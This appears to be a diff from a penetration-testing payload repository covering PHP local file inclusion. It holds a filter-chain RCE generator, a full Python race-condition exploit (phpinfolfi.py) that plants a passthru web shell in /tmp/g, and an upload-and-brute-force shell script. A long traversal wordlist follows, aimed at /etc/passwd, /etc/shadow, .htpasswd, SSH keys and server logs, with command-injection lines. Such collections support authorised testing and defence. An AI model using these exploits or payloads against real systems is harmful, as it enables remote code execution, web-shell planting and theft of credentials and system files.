'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
'C': 'convert.iconv.UTF8.CSISO2022KR',
'8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
'9': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB',
'f': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213',
's': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61',
'z': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS',
'U': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932',
'P': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213',
'V': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5',
'0': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2',
'Y': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2',
'W': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2',
'd': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2',
'D': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2',
'7': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2',
'4': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2'
}
# generate some garbage base64
filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
filters += "convert.iconv.UTF8.UTF7|"
for c in base64_payload[::-1]:
filters += conversions[c] + "|"
# decode and reencode to get rid of everything that isn't valid base64
filters += "convert.base64-decode|"
filters += "convert.base64-encode|"
# get rid of equal signs
filters += "convert.iconv.UTF8.UTF7|"
filters += "convert.base64-decode"
final_payload = f"php://filter/{filters}/resource={file_to_use}"
with open('payload', 'w') as f:
f.write(final_payload)
r = requests.get(url, params={
"0": command,
"action": "include",
"file": final_payload
})
print(r.text)

200
File Inclusion/Files/phpinfolfi.py Normal file
View File

@ -0,0 +1,200 @@
#!/usr/bin/python
# https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
# The following line is not required but supposedly optimizes code.
# However, this breaks on some Python 2 installations, where the future module version installed is > 0.16. This can be a pain to revert.
# from builtins import range
from __future__ import print_function
import sys
import threading
import socket
def setup(host, port):
TAG="Security Test"
PAYLOAD="""%s\r
<?php $c=fopen('/tmp/g','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>\r""" % TAG
REQ1_DATA="""-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r""" % PAYLOAD
padding="A" * 5000
REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r
HTTP_ACCEPT: """ + padding + """\r
HTTP_USER_AGENT: """+padding+"""\r
HTTP_ACCEPT_LANGUAGE: """+padding+"""\r
HTTP_PRAGMA: """+padding+"""\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s""" %(len(REQ1_DATA),host,REQ1_DATA)
#modify this to suit the LFI script
LFIREQ="""GET /lfi.php?load=%s%%00 HTTP/1.1\r
User-Agent: Mozilla/4.0\r
Proxy-Connection: Keep-Alive\r
Host: %s\r
\r
\r
"""
return (REQ1, TAG, LFIREQ)
def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s2.connect((host, port))
s.send(phpinforeq)
d = ""
while len(d) < offset:
d += s.recv(offset)
try:
i = d.index("[tmp_name] =>")
if i == -1:
i = d.index("[tmp_name] =&gt;")
fn = d[i+17:i+31]
except ValueError:
return None
s2.send(lfireq % (fn, host))
d = s2.recv(4096)
s.close()
s2.close()
if d.find(tag) != -1:
return fn
counter=0
class ThreadWorker(threading.Thread):
def __init__(self, e, l, m, *args):
threading.Thread.__init__(self)
self.event = e
self.lock = l
self.maxattempts = m
self.args = args
def run(self):
global counter
while not self.event.is_set():
with self.lock:
if counter >= self.maxattempts:
return
counter+=1
try:
x = phpInfoLFI(*self.args)
if self.event.is_set():
break
if x:
print("\nGot it! Shell created in /tmp/g")
self.event.set()
except socket.error:
return
def getOffset(host, port, phpinforeq):
"""Gets offset of tmp_name in the php output"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(phpinforeq)
d = ""
while True:
i = s.recv(4096)
d+=i
if i == "":
break
# detect the final chunk
if i.endswith("0\r\n\r\n"):
break
s.close()
i = d.find("[tmp_name] =>")
if i == -1:
i = d.find("[tmp_name] =&gt;")
if i == -1:
raise ValueError("No php tmp_name in phpinfo output")
print("found %s at %i" % (d[i:i+10],i))
# padded up a bit
return i+256
def main():
print("LFI With PHPInfo()")
print("-=" * 30)
if len(sys.argv) < 2:
print("Usage: %s host [port] [threads]" % sys.argv[0])
sys.exit(1)
try:
host = socket.gethostbyname(sys.argv[1])
except socket.error as e:
print("Error with hostname %s: %s" % (sys.argv[1], e))
sys.exit(1)
port=80
try:
port = int(sys.argv[2])
except IndexError:
pass
except ValueError as e:
print("Error with port %d: %s" % (sys.argv[2], e))
sys.exit(1)
poolsz=10
try:
poolsz = int(sys.argv[3])
except IndexError:
pass
except ValueError as e:
print("Error with poolsz %d: %s" % (sys.argv[3], e))
sys.exit(1)
print("Getting initial offset...", end=' ')
reqphp, tag, reqlfi = setup(host, port)
offset = getOffset(host, port, reqphp)
sys.stdout.flush()
maxattempts = 1000
e = threading.Event()
l = threading.Lock()
print("Spawning worker pool (%d)..." % poolsz)
sys.stdout.flush()
tp = []
for i in range(0,poolsz):
tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))
for t in tp:
t.start()
try:
while not e.wait(1):
if e.is_set():
break
with l:
sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts))
sys.stdout.flush()
if counter >= maxattempts:
break
print()
if e.is_set():
print("Woot! \m/")
else:
print(":(")
except KeyboardInterrupt:
print("\nTelling threads to shutdown...")
e.set()
print("Shuttin' down...")
for t in tp:
t.join()
if __name__=="__main__":
print("Don't forget to modify the LFI URL")
main()

22
File Inclusion/Files/uploadlfi.py Normal file
View File

@ -0,0 +1,22 @@
from __future__ import print_function
from builtins import range
import itertools
import requests
import string
import sys
print('[+] Trying to win the race')
f = {'file': open('shell.php', 'rb')}
for _ in range(4096 * 4096):
requests.post('http://target.com/index.php?c=index.php', f)
print('[+] Bruteforcing the inclusion')
for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
url = 'http://target.com/index.php?c=/tmp/php' + fname
r = requests.get(url)
if 'load average' in r.text: # <?php echo system('uptime');
print('[+] We have got a shell: ' + url)
sys.exit(0)
print('[x] Something went wrong, please try again')

13
File Inclusion/Intruders/BSD-files.txt Normal file
View File

@ -0,0 +1,13 @@
/usr/pkg/etc/httpd/httpd.conf
/usr/local/etc/apache22/httpd.conf
/usr/local/etc/apache2/httpd.conf
/var/www/conf/httpd.conf
/var/www/logs/error_log
/var/www/logs/access_log
/etc/apache2/httpd2.conf
/var/apache2/logs/error_log
/var/apache2/logs/access_log
/var/log/httpd-error.log
/var/log/httpd-access.log
/var/log/httpd/error_log
/var/log/httpd/access_log

879
File Inclusion/Intruders/JHADDIX_LFI.txt Normal file
View File

@ -0,0 +1,879 @@
/.../.../.../.../.../
\…..\\\…..\\\…..\\\
%00../../../../../../etc/passwd
%00/etc/passwd%00
%00../../../../../../etc/shadow
%00/etc/shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
/../../../../../../../../%2A
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
=3D “/..” . “%2f..
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
admin/access_log
/admin/install.php
../../../administrator/inbox
/apache2/logs/access_log
/apache2/logs/access.log
/apache2/logs/error_log
/apache2/logs/error.log
/apache/logs/access_log
/apache/logs/access.log
../../../../../apache/logs/access.log
../../../../apache/logs/access.log
../../../apache/logs/access.log
../../apache/logs/access.log
../apache/logs/access.log
/apache/logs/error_log
/apache/logs/error.log
../../../../../apache/logs/error.log
../../../../apache/logs/error.log
../../../apache/logs/error.log
../../apache/logs/error.log
../apache/logs/error.log
/apache\php\php.ini
\\&apos;/bin/cat%20/etc/passwd\\&apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
/.bash_history
/.bash_profile
/.bashrc
/../../../../../../../../bin/id|
/bin/php.ini
/boot/grub/grub.conf
/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
..//..//..//..//..//boot.ini
../../../../../../../../../../../../boot.ini
../../boot.ini
..\../..\../..\../..\../boot.ini
..\../..\../boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini%00
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
c:\apache\logs\access.log
c:\apache\logs\error.log
c:\AppServ\MySQL
C:/boot.ini
C:\boot.ini
/C:/inetpub/ftproot/
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
c:\inetpub\wwwroot\index.asp
/config.asp
../config.asp
config.asp
../config.inc.php
config.inc.php
../config.js
config.js
_config.php
../_config.php
../config.php
config.php
../_config.php%00
../../../../../../../../conf/server.xml
/core/config.php
/C:\Program Files\
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\error.log
/.cshrc
c:\System32\Inetsrv\metabase.xml
c:WINDOWS/system32/
d:\AppServ\MySQL
database.asp
database.js
database.php
data.php
dbase.php a
db.php
../../../../../../../dev
/D:\Program Files\
d:\System32\Inetsrv\metabase.xml
/etc/apache2/apache2.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
/etc/apache/apache.conf
/etc/apache/conf/httpd.conf
/etc/apache/httpd.conf
/etc/apt/sources.list
/etc/chrootUsers
/etc/crontab
/etc/defaultdomain
/etc/default/passwd
/etc/defaultrouter
/etc/fstab
/etc/ftpchroot
/etc/ftphosts
/etc/group
/etc/hostname.bge
/etc/hostname.ce0
/etc/hostname.ce1
/etc/hostname.ce2
/etc/hostname.ce3
/etc/hostname.dcelx0
/etc/hostname.dcelx1
/etc/hostname.dcelx2
/etc/hostname.dcelx3
/etc/hostname.dmfe0
/etc/hostname.dmfe1
/etc/hostname.dmfe2
/etc/hostname.dmfe3
/etc/hostname.dnet0
/etc/hostname.dnet1
/etc/hostname.dnet2
/etc/hostname.dnet3
/etc/hostname.ecn0
/etc/hostname.ecn1
/etc/hostname.ecn2
/etc/hostname.ecn3
/etc/hostname.elx0
/etc/hostname.elx1
/etc/hostname.elx2
/etc/hostname.elx3
/etc/hostname.elxl0
/etc/hostname.elxl1
/etc/hostname.elxl2
/etc/hostname.elxl3
/etc/hostname.eri0
/etc/hostname.eri1
/etc/hostname.eri2
/etc/hostname.eri3
/etc/hostname.ge0
/etc/hostname.ge1
/etc/hostname.ge2
/etc/hostname.ge3
/etc/hostname.hme0
/etc/hostname.hme1
/etc/hostname.hme2
/etc/hostname.hme3
/etc/hostname.ieef0
/etc/hostname.ieef1
/etc/hostname.ieef2
/etc/hostname.ieef3
/etc/hostname.iprb0
/etc/hostname.iprb1
/etc/hostname.iprb2
/etc/hostname.iprb3
/etc/hostname.le0
/etc/hostname.le1
/etc/hostname.le2
/etc/hostname.le3
/etc/hostname.lo
/etc/hostname.pcn0
/etc/hostname.pcn1
/etc/hostname.pcn2
/etc/hostname.pcn3
/etc/hostname.qfe0
/etc/hostname.qfe1
/etc/hostname.qfe2
/etc/hostname.qfe3
/etc/hostname.spwr0
/etc/hostname.spwr1
/etc/hostname.spwr2
/etc/hostname.spwr3
/etc/hosts
../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../etc/hosts%00
/etc/hosts.allow
/etc/hosts.deny
/etc/hosts.equiv
/etc/http/conf/httpd.conf
/etc/httpd.conf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/squirrelmail.conf
/etc/httpd/conf.d/ssl.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
../../../../../etc/httpd/logs/access_log
../../../../../etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../etc/httpd/logs/error_log
../../../../../etc/httpd/logs/error.log
/etc/httpd/php.ini
/etc/http/httpd.conf
/etc/inetd.conf
/etc/init.d/apache
/etc/init.d/apache2
/etc/issue
/etc/logrotate.d/ftp
/etc/logrotate.d/httpd
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/mail/access
/etc/mailman/mm_cfg.py
/etc/make.conf
/etc/master.passwd
/etc/motd
/etc/my.cnf
/etc/mysql/my.cnf
/etc/netconfig
/etc/nsswitch.conf
/etc/opt/ipf/ipf.conf
/etc/opt/ipf/ipnat.conf
/./././././././././././etc/passwd
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd^^
/..\../..\../..\../..\../..\../..\../etc/passwd
/etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../etc/passwd
..\..\..\..\..\..\..\..\..\..\etc\passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
\..\..\..\..\..\..\..\..\..\..\etc\passwd
etc/passwd
/etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../etc/passwd%00
../../../etc/passwd%00
../../etc/passwd%00
../etc/passwd%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
/../../../../../../../../../../../etc/passwd%00.html
/../../../../../../../../../../../etc/passwd%00.jpg
../../../../../../etc/passwd&=%3C%3C%3C%3C
/etc/php4.4/fcgi/php.ini
/etc/php4/apache2/php.ini
/etc/php4/apache/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/cgi/php.ini
/etc/php/apache2/php.ini
/etc/php/apache/php.ini
/etc/php/cgi/php.ini
/etc/php.d/dom.ini
/etc/php.d/gd.ini
/etc/php.d/imap.ini
/etc/php.d/json.ini
/etc/php.d/ldap.ini
/etc/php.d/mbstring.ini
/etc/php.d/mysqli.ini
/etc/php.d/mysql.ini
/etc/php.d/odbc.ini
/etc/php.d/pdo.ini
/etc/php.d/pdo_mysql.ini
/etc/php.d/pdo_odbc.ini
/etc/php.d/pdo_pgsql.ini
/etc/php.d/pdo_sqlite.ini
/etc/php.d/pgsql.ini
/etc/php.d/xmlreader.ini
/etc/php.d/xmlwriter.ini
/etc/php.d/xsl.ini
/etc/php.d/zip.ini
/etc/php.ini
/etc/php/php4/php.ini
/etc/php/php.ini
/etc/postfix/mydomains
/etc/proftp.conf
/etc/proftpd/modules.conf
/etc/protpd/proftpd.conf
/etc/pure-ftpd.conf
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/release
/etc/resolv.conf
/etc/rpc
/etc/security/environ
/etc/security/failedlogin
/etc/security/group
/etc/security/lastlog
/etc/security/limits
/etc/security/passwd
/etc/security/user
/./././././././././././etc/shadow
/../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/shadow^^
/..\../..\../..\../..\../..\../..\../etc/shadow
/etc/shadow
../../../../../../../../../../../../etc/shadow
..\..\..\..\..\..\..\..\..\..\etc\shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\shadow
../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
etc/shadow%00
/etc/ssh/sshd_config
/etc/sudoers
/etc/syslog.conf
/etc/syslogd.conf
/etc/system
/etc/updatedb.conf
/etc/utmp
/etc/vfstab
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wtmp
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/.forward
/home2\bin\stable\apache\php.ini
/home/apache/conf/httpd.conf
/home/apache/httpd.conf
/home\bin\stable\apache\php.ini
/.htpasswd
.htpasswd
../.htpasswd
../install.php
install.php
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../localstart.asp%00
/log/miscDir/accesslog
/.logout
/logs/access_log
/logs/access.log
../../../../../logs/access.log
../../../../logs/access.log
../../../logs/access.log
../../logs/access.log
../logs/access.log
/logs/error_log
/logs/error.log
../../../../../logs/error.log
../../../../logs/error.log
../../../logs/error.log
../../logs/error.log
../logs/error.log
/logs/pure-ftpd.log
/master.passwd
member/.htpasswd
members/.htpasswd
/.netrc
/NetServer\bin\stable\apache\php.ini
/opt/apache2/conf/httpd.conf
/opt/apache/conf/httpd.conf
/opt/lampp/logs/access_log
/opt/lampp/logs/access.log
/opt/lampp/logs/error_log
/opt/lampp/logs/error.log
/opt/xampp/etc/php.ini
/opt/xampp/logs/access_log
/opt/xampp/logs/access.log
/opt/xampp/logs/error_log
/opt/xampp/logs/error.log
.pass
../.pass
pass.dat
passwd
/.passwd
.passwd
../.passwd
passwd.dat
/php4\php.ini
/php5\php.ini
/php\php.ini
/PHP\php.ini
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/proc/cpuinfo
/proc/interrupts
/proc/loadavg
/proc/meminfo
/proc/mounts
/proc/net/arp
/proc/net/dev
/proc/net/route
/proc/net/tcp
/proc/partitions
/proc/self/cmdline
/proc/self/envron
/proc/version
/.profile
/Program Files\Apache Group\Apache2\conf\httpd.conf
/Program Files\Apache Group\Apache\conf\httpd.conf
/Program Files\Apache Group\Apache\logs\access.log
/Program Files\Apache Group\Apache\logs\error.log
/Program Files\xampp\apache\conf\httpd.conf
/../../../../pswd
/.rhosts
/root/.bash_history
/root/.bash_logut
root/.htpasswd
/root/.ksh_history
/root/.Xauthority
/.sh_history
/.shosts
/.ssh/authorized_keys
user/.htpasswd
../users.db.php
users.db.php
users/.htpasswd
/usr/apache2/conf/httpd.conf
/usr/apache/conf/httpd.conf
/usr/etc/pure-ftpd.conf
/usr/lib/cron/log
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/lib/security/mkuser.default
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/error.log
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/httpd.conf
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_ log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access. log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../usr/local/apache/logs/access_log
../../../../../usr/local/apache/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../usr/local/apache/logs/error_log
../../../../../usr/local/apache/logs/error.log
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/httpd/conf/httpd.conf
/usr/local/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.php
/usr/local/php/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/thttpd_log
/usr/local/Zend/etc/php.ini
/usr/pkgsrc/net/pureftpd/
/usr/ports/contrib/pure-ftpd/
/usr/ports/ftp/pure-ftpd/
/usr/ports/net/pure-ftpd/
/usr/sbin/pure-config.pl
/usr/spool/lp/log
/usr/spool/mqueue/syslog
/var/adm
/var/adm/acct/sum/loginlog
/var/adm/aculog
/var/adm/aculogs
/var/adm/crash/unix
/var/adm/crash/vmcore
/var/adm/cron/log
/var/adm/dtmp
/var/adm/lastlog
/var/adm/lastlog/username
/var/adm/log/asppp.log
/var/adm/loginlog
/var/adm/log/xferlog
/var/adm/lp/lpd-errs
/var/adm/messages
/var/adm/pacct
/var/adm/qacct
/var/adm/ras/bootlog
/var/adm/ras/errlog
/var/adm/sulog
/var/adm/SYSLOG
/var/adm/utmp
/var/adm/utmpx
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/X0msgs
/var/apache/log
/var/apache/logs
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/cron/log
/var/lib/mlocate/mlocate.db
/var/lib/mysql/my.cnf
/var/local/www/conf/php.ini
/var/lock/samba
/var/log
/var/log/access_log
/var/log/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../var/log/access_log
/var/log/acct
/var/log/apache2/access_log
/var/log/apache2/access.log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache2/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache2/error.log
/var/log/apache/access_log
/var/log/apache/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache/access.log
../../../../../var/log/apache/access_log
../../../../../var/log/apache/access.log
/var/log/apache/error_log
/var/log/apache/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache/error.log
../../../../../var/log/apache/error_log
../../../../../var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/auth
/var/log/authlog
/var/log/auth.log
/var/log/boot.log
/var/log/cron.log
/var/log/dmesg
/var/log/error_log
/var/log/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
../../../../../var/log/error_log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim_paniclog
/var/log/exim/paniclog
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/ftplog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd/
/var/log/httpd/access_log
/var/log/httpd/access.log
../../../../../var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/httpd/error.log
../../../../../var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd
/var/log/maillog
/var/log/message
/var/log/messages
/var/log/mysqlderror.log
/var/log/mysqld.log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/log/ncftpd.errs
/var/log/ncftpd/misclog.txt
/var/log/news
/var/log/news.all
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
